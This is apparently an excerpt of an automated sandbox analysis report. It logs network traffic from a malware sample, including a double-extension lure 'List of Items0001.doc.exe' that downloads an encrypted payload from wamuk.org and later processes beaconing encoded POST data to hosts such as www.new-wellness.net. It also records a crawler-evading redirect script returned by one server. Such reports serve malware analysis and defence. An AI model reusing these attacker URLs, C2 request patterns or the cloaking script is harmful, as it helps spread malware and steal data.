                                              Data Ascii: 7LY=6dvVVX/18e5LLXnPCr0Xntdr++LW887fxBi/c4xsUNI4/qrlfV+GXvBFo14Z8LJJPAcxMp1qJMMpvySnq6QWfgLOB45IT9tO3gAdJxmoU6Kv7Ynk7fNWDANM2RxocpC9uracDhEUU+y+4Sw4IwtWvriLsCgJuwq82kGuVeDMSQJSpxso2jMDQJSfhE26ss53fnXDSM+QHPucR1bcdaM/rKVBOb2yNN2FrnlYdz+ALGPQTVN3BFh3/P280/gL4m5NDJgs6DaDzWLVpmkyXUsTSAVyr+aHcMHmdsCLfrurSjndLoP8uPOuPkYz2LyNViyZC0zET+LnuL10F2QDrKzRTQRIS5MA5+HyDSbWD056AmWz4yP3hF6yf0oZVZjXuoPK9OZ2KI1SUIOEk+INWSeW0LZ9QyEicdhpl1uD3eDt2R9e3Iz4rWwe9MKd8pF47/XadEGRPycbhDLQwTSNgGlVOadlStNtRpIiPiHz5XQv4IRScHMhH+2KWQhGeJyMYMDtRdLO5HgN30ScQTY8DNoVX71YM07yUYY9Roepd47re0o2aRG4/ZkeORO7gVmK2HKtEwY6fg1VrTWZWFrjT0WbyVGEmCkHPkNvtXYsEule1wLqAC/L4x3abJRjv2KOziEEBLVoIxCNr3e6u3F5iEcZwfDYI4XHlQbjgn3NCo6D7KvzV0X0HnI6bxWmJReW68/ZBk5r3Gse0d
                                              Sep 24, 2024 11:31:07.230916023 CEST2618OUTData Raw: 59 61 49 56 5a 36 4a 4e 72 79 57 47 2f 4c 39 39 76 72 55 42 44 71 65 56 6a 6c 34 37 49 77 55 61 59 6e 38 46 6a 41 30 57 46 44 52 50 5a 6a 2b 57 65 6b 6e 37 78 70 72 4e 56 68 70 2b 63 43 41 50 68 77 49 79 58 58 77 55 73 33 72 74 50 74 67 76 37 63
                                              Data Ascii: YaIVZ6JNryWG/L99vrUBDqeVjl47IwUaYn8FjA0WFDRPZj+Wekn7xprNVhp+cCAPhwIyXXwUs3rtPtgv7cOsn1/HF7DVg2QCcmmf1HIbvb+3GREQKtsNBJ4NB6z5IX5w01tZ+EGEGhDS+mZIV6egbDS82r6EBGAVZ0gNA8NzNTGV8dXK+CWVzngED8EXuCrtHZLAFYEqA3waHQUouxUy5lav4SHVpO4oWoVZgyVU0FPH16EM4IL
                                              Sep 24, 2024 11:31:07.388753891 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 497
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:07 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              73192.168.11.3049967172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:09.912312031 CEST495OUTGET /cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM= HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:31:10.066571951 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 496
                                              X-Ratelimit-Reset: 1727173861
                                              Date: Tue, 24 Sep 2024 09:31:09 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              74192.168.11.3049968134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:15.279637098 CEST773OUTPOST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 2f 68 43 54 66 30 71 77 33 35 6f 71 30 74 34 64 32 44 31 63 78 6e 58 6b 75 7a 69 64 61 4b 48 77 38 74 44 42 64 32 6b 37 71 7a 4e 75 61 67 4d 59 57 6b 4c 45 37 6c 61 45 48 48 66 50 75 74 7a 6d 70 47 36 53 76 6a 6c 38 44 6d 71 45 55 2b 44 6d 54 69 68 55 77 35 72 4c 76 39 66 4d 42 4c 54 52 74 74 6d 43 61 74 4d 63 31 6b 72 49 7a 68 51 4f 4b 34 68 7a 64 49 6e 51 4a 37 34 74 31 31 63 78 59 30 52 58 70 32 2b 47 59 79 71 4f 46 75 4c 6e 56 4f 37 5a 66 2b 51 42 74 2b 6a 51 31 49 38 36 46 33 41 2f 65 52 42 53 6b 44 34 35 65 4d 37 70 2f 6f 53 70 75 64 50 67 34 31 39 4e 33 76 4d 34 2f 41 3d 3d
                                              Data Ascii: 7LY=/hCTf0qw35oq0t4d2D1cxnXkuzidaKHw8tDBd2k7qzNuagMYWkLE7laEHHfPutzmpG6Svjl8DmqEU+DmTihUw5rLv9fMBLTRttmCatMc1krIzhQOK4hzdInQJ74t11cxY0RXp2+GYyqOFuLnVO7Zf+QBt+jQ1I86F3A/eRBSkD45eM7p/oSpudPg419N3vM4/A==
                                              Sep 24, 2024 11:31:15.473572016 CEST401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              75192.168.11.3049969134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:18.018513918 CEST793OUTPOST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 2f 68 43 54 66 30 71 77 33 35 6f 71 32 4f 67 64 77 56 39 63 32 48 57 57 6c 54 69 64 51 71 48 30 38 74 2f 42 64 33 51 72 72 42 35 75 61 42 38 59 52 56 4c 45 34 6c 61 45 4d 6e 66 4f 67 4e 7a 74 70 47 6d 77 76 68 78 38 44 6d 75 45 55 2b 7a 6d 54 52 59 43 78 70 72 4a 6a 64 66 43 50 72 54 52 74 74 6d 43 61 74 59 36 31 6e 62 49 30 52 4d 4f 4c 64 56 79 44 59 6e 54 4d 4c 34 74 6b 6c 63 31 59 30 52 6c 70 79 66 54 59 77 53 4f 46 76 37 6e 56 2f 37 61 57 2b 51 48 6a 65 69 7a 6a 4c 68 78 45 54 38 39 59 77 68 31 73 67 35 41 66 62 4b 7a 69 72 6d 72 39 39 7a 4e 6b 30 51 6c 31 74 4e 6a 69 4b 33 34 78 4d 5a 4d 33 51 4d 63 72 42 4a 63 4a 35 65 5a 6c 41 41 3d
                                              Data Ascii: 7LY=/hCTf0qw35oq2OgdwV9c2HWWlTidQqH08t/Bd3QrrB5uaB8YRVLE4laEMnfOgNztpGmwvhx8DmuEU+zmTRYCxprJjdfCPrTRttmCatY61nbI0RMOLdVyDYnTML4tklc1Y0RlpyfTYwSOFv7nV/7aW+QHjeizjLhxET89Ywh1sg5AfbKzirmr99zNk0Ql1tNjiK34xMZM3QMcrBJcJ5eZlAA=
                                              Sep 24, 2024 11:31:18.214925051 CEST401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:18 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              76192.168.11.3049970134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:20.750449896 CEST3910OUTPOST /tohg/ HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.new-wellness.net
                                              Referer: http://www.new-wellness.net/tohg/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 2f 68 43 54 66 30 71 77 33 35 6f 71 32 4f 67 64 77 56 39 63 32 48 57 57 6c 54 69 64 51 71 48 30 38 74 2f 42 64 33 51 72 72 42 42 75 64 7a 59 59 53 79 33 45 35 6c 61 45 46 48 66 44 67 4e 7a 77 70 47 2b 30 76 68 39 47 44 6b 47 45 46 74 4c 6d 62 45 30 43 2b 70 72 4a 74 4e 66 50 42 4c 54 49 74 74 32 47 61 74 49 36 31 6e 62 49 30 51 38 4f 4d 49 68 79 45 6f 6e 51 4a 37 34 78 31 31 63 52 59 30 5a 66 70 79 61 6f 59 32 4f 4f 5a 4d 44 6e 56 74 54 61 57 2b 51 48 6b 65 69 2b 6a 4c 74 30 45 56 55 70 59 78 59 41 72 54 31 41 66 2f 4f 76 2b 71 57 54 6f 4c 2f 62 34 56 67 74 36 74 46 39 69 74 7a 62 34 63 4a 50 67 79 63 4a 7a 45 4e 6e 65 37 75 64 2b 56 61 44 49 30 55 42 31 34 6d 74 7a 47 47 33 37 4f 68 56 58 4d 75 74 39 31 56 63 4d 30 75 6e 75 37 74 4f 62 6c 31 69 79 4f 45 6d 5a 5a 4a 4f 31 72 61 64 4e 6c 6d 33 67 79 72 61 53 5a 38 77 36 69 75 30 79 4a 6b 75 6d 31 6b 2f 64 74 65 70 55 66 32 52 59 4b 48 4a 6b 69 78 47 31 73 34 56 6e 4d 51 45 37 76 56 50 74 6f 37 4b 55 75 51 4b 35 74 77 67 78 7a 42 49 38 50 [TRUNCATED]
                                              Data Ascii: 7LY=/hCTf0qw35oq2OgdwV9c2HWWlTidQqH08t/Bd3QrrBBudzYYSy3E5laEFHfDgNzwpG+0vh9GDkGEFtLmbE0C+prJtNfPBLTItt2GatI61nbI0Q8OMIhyEonQJ74x11cRY0ZfpyaoY2OOZMDnVtTaW+QHkei+jLt0EVUpYxYArT1Af/Ov+qWToL/b4Vgt6tF9itzb4cJPgycJzENne7ud+VaDI0UB14mtzGG37OhVXMut91VcM0unu7tObl1iyOEmZZJO1radNlm3gyraSZ8w6iu0yJkum1k/dtepUf2RYKHJkixG1s4VnMQE7vVPto7KUuQK5twgxzBI8Pqv9PFKaodQZlUjUuenI5dqZlbp2urH83Qc1rxNj7gbyJRbrw/xXVAofy6HZZRRgwODvbECD0W0E4l/7HnMPaUY4wyNWNj5Y+HznSWg+dSopzVkbyPXnJ+3rvywrDaMuBMMYNTFgEbmhtFH4wsuMwsZrwWBMUXj3F4XNSVSXWGJEOT10eIpJS9nOHK81uBx/ed3Kkc9NQg7uaUkkOisfYybCjh8vnZlbiuMYi9F7sSJLtSs7VzjyBj2gd4v2qFSdwZ/8JU8ppHWDg9uK7IpIDea8hetwGF7CImI8/0bEbxyYBqRV+9uNk9MAmbnepR6neMKO/1lZVW4vzyKIIFHbDodMDX2Tlkjs0XEJ2/H/E1eOP68tDkvN60BQzKc5qoLV5Ve/g7Yk3sTU31j4BKD/risx2d8pPFbAfnliYZ8p0dPdtaS+prRm4R0gAcFwzn51ntQr6lJba5Qtf6v2crTN3uX+nfXGLkbmHEErve/R3TZvSzhFi10jXj4TwTAhOkU6AbTy9krnfhBZhJEvbdwiD1X4ZVXcogmKcGOP0w8HEFSzFghLLFISsqPXPemhiL8nfxpUKRw3Cu347loDe0MVG9cpCMZyDCNHfP1r0hcnyGp3gaXnPcAmhB8oJ8q0TAmi0Dd9ypNss37GtNYOWx4mnmslarHwAJtv+QC [TRUNCATED]
                                              Sep 24, 2024 11:31:20.946923971 CEST401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:20 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8e 31 0f 82 30 10 85 f7 fe 8a 93 5d 0e 0d e3 a5 83 02 91 04 91 98 32 38 62 5a 53 12 a4 48 8b c6 7f 2f 85 c5 f1 dd fb ee cb a3 4d 72 39 8a 5b 95 c2 49 9c 0b a8 ea 43 91 1f 21 d8 22 e6 a9 c8 10 13 91 ac cd 3e 8c 10 d3 32 e0 8c b4 7b 76 9c b4 6a e4 1c 5c eb 3a c5 e3 28 86 d2 38 c8 cc d4 4b c2 f5 c8 08 17 88 ee 46 7e fd df 8e ff 31 73 62 34 70 a1 15 8c ea 35 29 eb 94 84 fa 5a c0 a7 b1 d0 cf dc c3 73 60 7a 70 ba b5 60 d5 f8 56 63 48 38 78 ef 62 9c 1d 7e 09 fb 01 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: adM10]28bZSH/Mr9[IC!">2{vj\:(8KF~1sb4p5)Zs`zp`VcH8xb~|<0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              77192.168.11.3049971134.119.247.136804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:31:23.479537964 CEST496OUTGET /tohg/?7LY=yjqzcBzk86gS97o1hEgN6leh0gqiWIOHs+n5cGEGjSIKUxpSNCnE5Wq2EyXzrtnAt0SEhBRJIzSMRq3CHi5k3dz0/t/HC6DV0cbuHslMoBzbtjkOL7N7Vc4=&Nze=C0klVT HTTP/1.1
                                              Host: www.new-wellness.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:31:23.672920942 CEST382INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:31:23 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 196
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.11.3049892162.213.195.464438044C:\Users\user\Desktop\List of Items0001.doc.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-24 09:25:42 UTC171OUTGET /css/NxTelX253.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: wamuk.org
                                              Cache-Control: no-cache
                                              2024-09-24 09:25:42 UTC223INHTTP/1.1 200 OK
                                              Date: Tue, 24 Sep 2024 09:25:42 GMT
                                              Server: Apache
                                              Last-Modified: Tue, 24 Sep 2024 03:01:01 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 286272
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              2024-09-24 09:25:42 UTC7969INData Raw: f8 b1 83 6e 7c fc e5 b1 23 c8 6d 28 b9 42 00 b3 b2 1b f6 86 1b f9 21 94 3a 7a 7a 6b 43 49 d5 38 6e da db 14 6c 2b 70 f0 2c 41 08 66 08 28 2b 8a 37 f2 91 4e b8 6b a3 14 ef 05 1a 19 4b 47 90 c2 61 9e 70 81 9b 2b 6c 19 3b b2 88 db 57 9d 06 33 fc d6 82 4a fa 71 76 e3 bd 4b 34 12 cb 4b 75 d4 9d bb 53 2d ad 5f 5b 24 e7 9f 3b 96 95 7b 18 f7 45 d6 94 c5 ab ce 52 27 1f 2b 50 af e2 df 35 ed 58 7f 10 3f dc 8c 80 a8 d7 2e 11 fe 79 06 bf 26 72 75 7c 1a 61 31 7d 9b 59 16 e3 da 93 66 04 4c d3 ce cf 5b 1a bf 10 a6 dc 99 77 b2 ea b8 63 38 01 75 e1 50 9c ac 9d a0 60 32 c4 27 1a 9d be 29 e6 c5 11 1c 1f 98 cf 7d 5f 67 b8 da ff 17 72 19 d6 d2 b8 72 d8 21 c6 3f 6e 98 b5 a5 ad 42 89 26 f4 e4 5e 86 b7 4d 52 48 c4 29 92 e2 75 91 66 91 eb b0 03 f8 d3 7d 99 c9 69 fe 71 f3 3e da c6
                                              Data Ascii: n|#m(B!:zzkCI8nl+p,Af(+7NkKGap+l;W3JqvK4KuS-_[$;{ER'+P5X?.y&ru|a1}YfL[wc8uP`2')}_grr!?nB&^MRH)uf}iq>
                                              2024-09-24 09:25:42 UTC8000INData Raw: e8 06 08 25 e5 f1 9f a2 4a b7 aa bf b8 04 30 4d ed c8 18 d8 fa 62 1b a4 a0 29 fe bc df f2 3a 3c 0d 70 45 f6 91 2a b0 a7 0d 48 52 68 c8 b6 75 5e 11 01 e7 41 af 8a a8 34 34 5c f3 39 26 23 53 b4 75 8f 28 c6 1c bf 8d 5b 98 71 64 9f 7a d0 c6 34 b3 aa 1a 46 b9 98 ce 51 e7 47 61 20 b6 17 7f aa 95 46 5b ea 0b 4e 43 57 45 71 19 eb 09 4a 79 c9 f0 6b 16 80 c2 ad 5f da 34 55 64 e4 33 2d ad 23 bd ad aa 7b b0 db 25 c3 65 89 45 d6 19 8c ab 4d ab 14 10 67 9e e7 2f 28 be 98 ba e9 e7 81 5d c6 81 4a f6 96 6d 9d f2 9f 78 6a 52 94 ab 84 10 88 db 13 3a f0 01 78 1a 17 69 e1 2a e2 68 3e 3a cd 65 e3 34 7b df b9 6f 82 31 5e ed e4 8d 1a b2 a1 ec 7e cd 47 28 9e 0d 9d be 29 12 71 24 43 dd 07 23 75 91 a2 54 64 62 cf 5e af cc 74 aa 66 e2 41 a1 f7 be 31 50 9c d9 57 16 5e ab 82 7c 38 2b
                                              Data Ascii: %J0Mb):<pE*HRhu^A44\9&#Su([qdz4FQGa F[NCWEqJyk_4Ud3-#{%eEMg/(]JmxjR:xi*h>:e4{o1^~G()q$C#uTdb^tfA1PW^|8+
                                              2024-09-24 09:25:42 UTC8000INData Raw: cb 18 db 9f 0b 00 5d 58 3a b2 cf 02 4e cd e8 c9 be 0f 03 ad bb 69 2a 67 33 e3 a3 e8 01 c9 90 51 7e 60 f5 c7 94 23 52 fd ff 42 d8 1f db ac 1c 45 03 a6 9c 44 2e 31 7c 2b 6d e2 2b bf 24 5a d1 4e f1 3c d5 16 52 49 a3 64 c6 88 61 23 bd ac 95 5d a0 24 1c 7b 45 aa 8e e8 5b f2 39 d8 2d 07 ac 9d 9f 43 a3 9f 3d 5a 66 00 d0 b8 cc 84 98 37 c9 3e 95 96 1e 6d bf 67 47 39 94 4c 82 fb dd 49 4d ae 61 26 fe 0b bc 88 34 c5 34 20 c0 a4 29 e4 49 ac 92 c3 6e e9 f5 03 54 82 a6 8d 2d d2 f1 98 41 95 ff 8f ce 94 2c d7 33 1c 10 be fa ed 2d dd f9 f2 70 98 33 24 56 ae b3 28 c3 69 9b d3 cd 18 23 50 c9 8d d4 98 aa 5e 38 b4 05 0c 6d c5 dc 72 2b df e0 dd b7 3e 72 18 19 af 3c 42 1c b9 c9 54 74 78 b7 84 99 69 a7 b8 60 de 5a 0d bf b0 64 b7 95 b9 f3 84 a5 bf 6e 31 39 c0 f2 73 54 71 57 81 69
                                              Data Ascii: ]X:Ni*g3Q~`#RBED.1|+m+$ZN<RIda#]${E[9-C=Zf7>mgG9LIMa&44 )InT-A,3-p3$V(i#P^8mr+>r<BTtxi`Zdn19sTqWi
